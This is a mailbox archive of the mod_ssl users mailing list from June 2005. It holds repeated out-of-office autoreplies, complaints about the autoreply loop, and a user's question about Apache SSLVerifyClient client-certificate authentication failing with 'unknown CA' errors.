	for ; Fri, 24 Jun 2005 10:49:17 +0200 (CEST)
Received: from aaamsr001.abnamro.com (aaamsr001 [10.124.6.13])
	by triton09-out.inet.nl.abnamro.com (Postfix) with ESMTP id D5D516C78
	for ; Fri, 24 Jun 2005 10:49:17 +0200 (CEST)
Subject: Padraic Coyne/NL/ABNAMRO/NL is out of the office.
From: padraic.coyne@nl.abnamro.com
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 24 Jun 2005 10:47:06 +0200
X-MIMETrack: Serialize by Router on AAAMSR001/HUB/ABNAMRO/NL(Release 6.0.3|September 26, 2003) at
 06/24/2005 10:49:17 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: padraic.coyne@nl.abnamro.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





I will be out of the office starting  24-06-2005 and will not return until
28-06-2005.

I will respond to your message when I return.

I can be contacted at the following email address:
padraic.coyne@uk.ibm.com
---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 10:53:51 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E1B3E14D9DC; Fri, 24 Jun 2005 10:53:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from triton09-out.inet.nl.abnamro.com (triton09.abnamro.nl [167.202.193.25])
	by master.modssl.org (Postfix) with ESMTP id A66CD14D9D0
	for ; Fri, 24 Jun 2005 10:53:51 +0200 (CEST)
Received: from aaamsr001.abnamro.com (aaamsr001 [10.124.6.13])
	by triton09-out.inet.nl.abnamro.com (Postfix) with ESMTP id 3D73D74A3
	for ; Fri, 24 Jun 2005 10:53:51 +0200 (CEST)
Subject: Padraic Coyne/NL/ABNAMRO/NL is out of the office.
From: padraic.coyne@nl.abnamro.com
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 24 Jun 2005 10:51:15 +0200
X-MIMETrack: Serialize by Router on AAAMSR001/HUB/ABNAMRO/NL(Release 6.0.3|September 26, 2003) at
 06/24/2005 10:53:51 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: padraic.coyne@nl.abnamro.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





I will be out of the office starting  24-06-2005 and will not return until
28-06-2005.

I will respond to your message when I return.

I can be contacted at the following email address:
padraic.coyne@uk.ibm.com
---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 10:55:34 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 47C1B14D9DC; Fri, 24 Jun 2005 10:55:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from triton10-out.abnamro.nl (triton10.abnamro.nl [167.202.193.26])
	by master.modssl.org (Postfix) with ESMTP id 98DC014D9C6
	for ; Fri, 24 Jun 2005 10:55:33 +0200 (CEST)
Received: from aaamsr001.abnamro.com (aaamsr001.inet.nl.abnamro.com [10.124.6.13])
	by triton10-out.abnamro.nl (Postfix) with ESMTP id 188163A0F5
	for ; Fri, 24 Jun 2005 10:55:33 +0200 (CEST)
Subject: Padraic Coyne/NL/ABNAMRO/NL is out of the office.
From: padraic.coyne@nl.abnamro.com
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 24 Jun 2005 10:53:19 +0200
X-MIMETrack: Serialize by Router on AAAMSR001/HUB/ABNAMRO/NL(Release 6.0.3|September 26, 2003) at
 06/24/2005 10:55:33 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: padraic.coyne@nl.abnamro.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





I will be out of the office starting  24-06-2005 and will not return until
28-06-2005.

I will respond to your message when I return.

I can be contacted at the following email address:
padraic.coyne@uk.ibm.com
---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 11:04:35 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EBB0F14D9D0; Fri, 24 Jun 2005 11:04:35 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from triton09-out.inet.nl.abnamro.com (triton09.abnamro.nl [167.202.193.25])
	by master.modssl.org (Postfix) with ESMTP id 3574A14D9AC
	for ; Fri, 24 Jun 2005 11:04:32 +0200 (CEST)
Received: from aaamsr001.abnamro.com (aaamsr001 [10.124.6.13])
	by triton09-out.inet.nl.abnamro.com (Postfix) with ESMTP id 4E40174D9
	for ; Fri, 24 Jun 2005 11:04:32 +0200 (CEST)
Subject: Padraic Coyne/NL/ABNAMRO/NL is out of the office.
From: padraic.coyne@nl.abnamro.com
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 24 Jun 2005 10:56:13 +0200
X-MIMETrack: Serialize by Router on AAAMSR001/HUB/ABNAMRO/NL(Release 6.0.3|September 26, 2003) at
 06/24/2005 11:04:32 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: padraic.coyne@nl.abnamro.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





I will be out of the office starting  24-06-2005 and will not return until
28-06-2005.

I will respond to your message when I return.

I can be contacted at the following email address:
padraic.coyne@uk.ibm.com
---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 11:19:25 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A2AD114D9D0; Fri, 24 Jun 2005 11:19:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from triton10-out.abnamro.nl (triton10.abnamro.nl [167.202.193.26])
	by master.modssl.org (Postfix) with ESMTP id 5B8B714D9AC
	for ; Fri, 24 Jun 2005 11:19:25 +0200 (CEST)
Received: from aaamsr001.abnamro.com (aaamsr001.inet.nl.abnamro.com [10.124.6.13])
	by triton10-out.abnamro.nl (Postfix) with ESMTP id 403CD3A01A
	for ; Fri, 24 Jun 2005 11:19:25 +0200 (CEST)
Subject: Padraic Coyne/NL/ABNAMRO/NL is out of the office.
From: padraic.coyne@nl.abnamro.com
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 24 Jun 2005 11:12:20 +0200
X-MIMETrack: Serialize by Router on AAAMSR001/HUB/ABNAMRO/NL(Release 6.0.3|September 26, 2003) at
 06/24/2005 11:19:25 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: padraic.coyne@nl.abnamro.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





I will be out of the office starting  24-06-2005 and will not return until
28-06-2005.

I will respond to your message when I return.

I can be contacted at the following email address:
padraic.coyne@uk.ibm.com
---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 11:24:45 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B37E614D9D2; Fri, 24 Jun 2005 11:24:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hermes.secude.com (hermes.secude.com [213.188.106.168])
	by master.modssl.org (Postfix) with ESMTP id 6B1F214D9C6
	for ; Fri, 24 Jun 2005 11:24:45 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by hermes.secude.com (Postfix) with ESMTP
	id 3A58830B11; Fri, 24 Jun 2005 13:32:28 +0200 (CEST)
Received: from hermes.secude.com ([127.0.0.1])
 by localhost (hermes.secude.com [127.0.0.1]) (amavisd-new, port 10024)
 with ESMTP id 90948-10; Fri, 24 Jun 2005 13:32:27 +0200 (CEST)
Received: from sr-postumus.SECUDE.COM (unknown [10.49.0.151])
	by hermes.secude.com (Postfix) with ESMTP
	id 6FF3030AD5; Fri, 24 Jun 2005 13:32:27 +0200 (CEST)
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C5789E.DDA48D7B"
Subject: change your autoreply configuration!!!!
Date: Fri, 24 Jun 2005 11:26:56 +0200
Message-ID: <707CCA047DAAC24E9D56FA1CF0D3246C0E224E@sr-postumus.SECUDE.COM>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: change your autoreply configuration!!!!
Thread-Index: AcV4nt4sRfmju9/QQYOBUzrVedx57w==
From: "Harald Langaker" 
To: 
Cc: 
X-Virus-Scanned: by amavisd-new at secude.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Harald Langaker" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C5789E.DDA48D7B
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hey!
You autoryply "out of office" to modssl-users@modssl.org
Can you please STOP that, I DO NOT WANT TO GET A MAIL FROM YOU EVERY =
TIME SOMEONE SENDS A MAIL TO
modssl-users@modssl.org!!!!!!!!!!!!!!!
=20
Otherwise there has to be taken action to get you off the list!
=20

Harald Langaker=20
Senior Quality Assurance Engineer
Fon +49.6151.82897-46=20
Fax +49.6151.82897-26=20

www.secude.com=20
mailto:langaker@secude.com  =20

SECUDE IT Security GmbH=20
Goebelstra=DFe 21, 64293 Darmstadt, Germany=20
CEO: Dr. Heiner Kromer=20
SECUDE is member of iT_SEC SWiSS AG=20
www.itsec-swiss.com  =20

=20


=20

=20

------_=_NextPart_001_01C5789E.DDA48D7B
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hey!


You =
autoryply "out=20
of office" to modssl-users@modssl.org


Can =
you please STOP=20
that, I DO NOT WANT TO GET A MAIL FROM YOU EVERY TIME SOMEONE SENDS A =
MAIL=20
TO


modssl-users@modssl.org!!!!!!=
!!!!!!!!!


 


Otherwise there has=20
to be taken action to get you off the list!


 





Harald Langaker 
Senior =
Quality=20
Assurance Engineer
Fon=20
+49.6151.82897-46 
Fax=20
+49.6151.82897-26 


www.secude.com 
mailto:langaker@secude.com=20



SECUDE IT Security =
GmbH=20

Goebelstra=DFe 21, 64293 Darmstadt, =
Germany=20

CEO: Dr. Heiner Kromer 
SECUDE is =
member of=20
iT_SEC SWiSS =
AG 
www.itsec-swiss.com 












 



 
=

=



 


------_=_NextPart_001_01C5789E.DDA48D7B--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 11:38:53 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 93B5C14D9D0; Fri, 24 Jun 2005 11:38:53 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from triton10-out.abnamro.nl (triton10.abnamro.nl [167.202.193.26])
	by master.modssl.org (Postfix) with ESMTP id 5592914D9AC
	for ; Fri, 24 Jun 2005 11:38:52 +0200 (CEST)
Received: from aaamsr001.abnamro.com (aaamsr001.inet.nl.abnamro.com [10.124.6.13])
	by triton10-out.abnamro.nl (Postfix) with ESMTP id C193D39F6B
	for ; Fri, 24 Jun 2005 11:38:52 +0200 (CEST)
Subject: Padraic Coyne/NL/ABNAMRO/NL is out of the office.
From: padraic.coyne@nl.abnamro.com
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 24 Jun 2005 11:19:32 +0200
X-MIMETrack: Serialize by Router on AAAMSR001/HUB/ABNAMRO/NL(Release 6.0.3|September 26, 2003) at
 06/24/2005 11:38:52 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: padraic.coyne@nl.abnamro.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





I will be out of the office starting  24-06-2005 and will not return until
28-06-2005.

I will respond to your message when I return.

I can be contacted at the following email address:
padraic.coyne@uk.ibm.com
---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 11:39:01 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5C94A14D9E0; Fri, 24 Jun 2005 11:39:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from triton08-out.abnamro.nl (triton08.abnamro.nl [167.202.193.24])
	by master.modssl.org (Postfix) with ESMTP id 1600714D9DC
	for ; Fri, 24 Jun 2005 11:38:58 +0200 (CEST)
Received: from aaamsr001.abnamro.com (aaamsr001 [10.124.6.13])
	by triton08-out.abnamro.nl (Postfix) with ESMTP id 7B2DD9E1C
	for ; Fri, 24 Jun 2005 11:38:58 +0200 (CEST)
Subject: Padraic Coyne/NL/ABNAMRO/NL is out of the office.
From: padraic.coyne@nl.abnamro.com
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 24 Jun 2005 11:25:32 +0200
X-MIMETrack: Serialize by Router on AAAMSR001/HUB/ABNAMRO/NL(Release 6.0.3|September 26, 2003) at
 06/24/2005 11:38:58 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: padraic.coyne@nl.abnamro.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





I will be out of the office starting  24-06-2005 and will not return until
28-06-2005.

I will respond to your message when I return.

I can be contacted at the following email address:
padraic.coyne@uk.ibm.com
---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 11:51:30 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7BC7B14D9D0; Fri, 24 Jun 2005 11:51:30 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from correo.gssi.es (payute.gssi.es [217.11.114.131])
	by master.modssl.org (Postfix) with ESMTP id 2B9ED14D9AC
	for ; Fri, 24 Jun 2005 11:51:28 +0200 (CEST)
Received: from [150.214.40.58] (vgg3.sci.uma.es [150.214.40.58])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by correo.gssi.es (Postfix) with ESMTP id 8FDE0542A5
	for ; Fri, 24 Jun 2005 11:32:40 +0200 (CEST)
Message-ID: <42BBD332.1040105@gssi.es>
Date: Fri, 24 Jun 2005 11:32:34 +0200
From: Victoriano Giralt 
User-Agent: Mozilla Thunderbird 1.0.2-1.3.3 (X11/20050513)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: change your autoreply configuration!!!!
References: <707CCA047DAAC24E9D56FA1CF0D3246C0E224E@sr-postumus.SECUDE.COM>
In-Reply-To: <707CCA047DAAC24E9D56FA1CF0D3246C0E224E@sr-postumus.SECUDE.COM>
X-Enigmail-Version: 0.89.5.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=ISO-8859-15; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Victoriano Giralt 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Harald Langaker wrote:
| Hey!
| You autoryply "out of office" to modssl-users@modssl.org
| 
| Can you please STOP that, I DO NOT WANT TO GET A MAIL FROM YOU EVERY
| TIME SOMEONE SENDS A MAIL TO
| modssl-users@modssl.org !!!!!!!!!!!!!!!
|
| Otherwise there has to be taken action to get you off the list!
It is even worse, te estupid thing replies to its own replies, so it is
an endless loop.

- --
- 
---------------------------------------------------------------------------
G & S Sistemas de Informacion, S.L.  | Telefono:  9 02 01 44 43
Victoriano Giralt                    | Land line: +34-952-207-241
Torre de San Telmo, 8                | Mobile:    +34-670-332-720
E-29018 Malaga (Spain)               | http://www.gssi.es/
- 
---------------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iD8DBQFCu9MxWHlx3l8ZumwRApfnAJ0QqRgim/IXJLj1Fan9S9p8v//KhQCfXkeR
OevZUSbTwtRS/oKTTAtBpaI=
=8F3R
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 28 13:42:04 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 97ED414D9CC; Tue, 28 Jun 2005 13:42:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from imf17aec.mail.bellsouth.net (imf17aec.mail.bellsouth.net [205.152.59.65])
	by master.modssl.org (Postfix) with ESMTP id 96B2914D98C
	for ; Tue, 28 Jun 2005 13:42:03 +0200 (CEST)
Received: from ibm57aec.bellsouth.net ([68.210.137.51])
          by imf17aec.mail.bellsouth.net with ESMTP
          id <20050628114202.ORAO2145.imf17aec.mail.bellsouth.net@ibm57aec.bellsouth.net>
          for ; Tue, 28 Jun 2005 07:42:02 -0400
Received: from [192.168.0.100] (really [68.210.137.51])
          by ibm57aec.bellsouth.net with ESMTP
          id <20050628114201.FOTZ25470.ibm57aec.bellsouth.net@[192.168.0.100]>
          for ; Tue, 28 Jun 2005 07:42:01 -0400
Mime-Version: 1.0 (Apple Message framework v730)
Content-Transfer-Encoding: 7bit
Message-Id: <6A873E9C-2FF5-4337-8251-E1236C378C66@bellsouth.net>
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
To: modssl-users@modssl.org
From: lingwitt@bellsouth.net
Subject: SSLVerifyClient
Date: Tue, 28 Jun 2005 07:42:00 -0400
X-Mailer: Apple Mail (2.730)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: lingwitt@bellsouth.net
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Please please help me get this stuff working.
I want client authentication. Currently, I am trying
to get authentication work with my own CA, but that is foobar.
I have an intranet where the people already have certificates.
I want to use the CA that signed those as well.
When s_client does work, it shows that the server
is requesting certificates signed by the allowed CAs, so I am
content with that.

It seems as if the browser is not sending the certificates to Apache.

I'm running Mac OS X Tiger, I've tried importing my own certificates
into Keychain, but that makes no difference, and besides, I already
have a certificate for my intranet in there that should work.
Moreover, my own signed certificates don't have purposes like "client  
authentication,"
which is perhaps the cause of some of the trouble.

Any advice will be appreciated.

When I have SSLVerifyClient none

I can log into the SSL enabled server just fine.


When it is SSLVerifyClient optional

s_client without a certificate works

s_client with a certificate produces:

CONNECTED(00000003)
SSL_connect:before/connect initialization
SSL_connect:SSLv2/v3 write client hello A
SSL_connect:SSLv3 read server hello A
depth=1 /C=US/ST=/L=/O=/OU=/CN=/ 
Email=
verify return:1
depth=0 /C=US/ST=/L=/O=/OU=Server/ 
CN=/Email=
verify return:1
SSL_connect:SSLv3 read server certificate A
SSL_connect:SSLv3 read server key exchange A
SSL_connect:SSLv3 read server certificate request A
SSL_connect:SSLv3 read server done A
SSL_connect:SSLv3 write client certificate A
SSL_connect:SSLv3 write client key exchange A
SSL_connect:SSLv3 write certificate verify A
SSL_connect:SSLv3 write change cipher spec A
SSL_connect:SSLv3 write finished A
SSL_connect:SSLv3 flush data
SSL3 alert read:fatal:unknown CA
SSL_connect:failed in SSLv3 read finished A
5100:error:14094418:SSL routines:SSL3_READ_BYTES:tlsv1 alert unknown  
ca:s3_pkt.c:1046:SSL alert number 48
5100:error:140790E5:SSL routines:SSL23_WRITE:ssl handshake  
failure:s23_lib.c:226:

and a browser causes:

[28/Jun/2005 07:20:28 05071] [info]  Connection to child 0  
established (server :443, client 127.0.0.1)
[28/Jun/2005 07:20:28 05071] [info]  Seeding PRNG with 0 bytes of  
entropy
[28/Jun/2005 07:20:28 05071] [error] Certificate Verification: Error  
(20): unable to get local issuer certificate
[28/Jun/2005 07:20:28 05071] [error] SSL handshake failed (server  
:443, client 127.0.0.1) (OpenSSL library error follows)
[28/Jun/2005 07:20:28 05071] [error] OpenSSL: error:140890B2:lib 
(20):func(137):reason(178)


When it is SSLVerifyClient require

s_client without certificate: same as with cert above

s_client with certificate:

CONNECTED(00000003)
SSL_connect:before/connect initialization
SSL_connect:SSLv2/v3 write client hello A
SSL_connect:SSLv3 read server hello A
depth=1 /C=US/ST=/L=/O=/OU=/CN=/ 
Email=
verify return:1
depth=0 /C=US/ST=/L=/O=/OU=/CN=/ 
Email=
verify return:1
SSL_connect:SSLv3 read server certificate A
SSL_connect:SSLv3 read server key exchange A
SSL_connect:SSLv3 read server certificate request A
SSL_connect:SSLv3 read server done A
SSL_connect:SSLv3 write client certificate A
SSL_connect:SSLv3 write client key exchange A
SSL_connect:SSLv3 write certificate verify A
SSL_connect:SSLv3 write change cipher spec A
SSL_connect:SSLv3 write finished A
SSL_connect:SSLv3 flush data
SSL3 alert read:fatal:unknown CA
SSL_connect:failed in SSLv3 read finished A
5111:error:14094418:SSL routines:SSL3_READ_BYTES:tlsv1 alert unknown  
ca:s3_pkt.c:1046:SSL alert number 48
5111:error:140790E5:SSL routines:SSL23_WRITE:ssl handshake  
failure:s23_lib.c:226:

browser produces errors:

[28/Jun/2005 07:20:28 05071] [info]  Connection to child 0  
established (server :443, client 127.0.0.1)
[28/Jun/2005 07:20:28 05071] [info]  Seeding PRNG with 0 bytes of  
entropy
[28/Jun/2005 07:20:28 05071] [error] Certificate Verification: Error  
(20): unable to get local issuer certificate
[28/Jun/2005 07:20:28 05071] [error] SSL handshake failed (server  
:443, client 127.0.0.1) (OpenSSL library error follows)
[28/Jun/2005 07:20:28 05071] [error] OpenSSL: error:140890B2:lib 
(20):func(137):reason(178)



Running s_server always works, and the client certificate from the  
browser is loaded up.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 28 14:15:04 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C1A1714D9CC; Tue, 28 Jun 2005 14:15:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailprimary.werum.de (mailprimary.werum.de [62.156.157.73])
	by master.modssl.org (Postfix) with ESMTP id 7C35114D98C
	for ; Tue, 28 Jun 2005 14:15:00 +0200 (CEST)
Received: from werum815.werum.net (werum815.werum.net [172.20.104.15])
	by mailprimary.werum.de (Postfix) with ESMTP id 0DBE2F9436
	for ; Tue, 28 Jun 2005 14:16:42 +0200 (CEST)
Received: from localhost (unknown [192.168.1.3])
	by werum815.werum.net (Postfix) with ESMTP id 170E6932A7;
	Tue, 28 Jun 2005 14:14:57 +0200 (CEST)
Received: from werum815.werum.net ([192.168.1.1])
 by localhost (mailclaw.werum.net [192.168.1.3]) (amavisd-new, port 10024)
 with ESMTP id 30631-04; Tue, 28 Jun 2005 14:12:56 +0200 (CEST)
Received: from [172.20.103.158] (werum758.werum.net [172.20.103.158])
	by werum815.werum.net (Postfix) with ESMTP id 8F4B5932A5
	for ; Tue, 28 Jun 2005 14:14:55 +0200 (CEST)
Message-ID: <42C13F42.9070108@werum.de>
Date: Tue, 28 Jun 2005 14:14:58 +0200
From: Eckard Wille 
User-Agent: Mozilla Thunderbird 1.6.2.0c (Windows/20050317)
X-Accept-Language: de, en-US
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSLVerifyClient
References: <6A873E9C-2FF5-4337-8251-E1236C378C66@bellsouth.net>
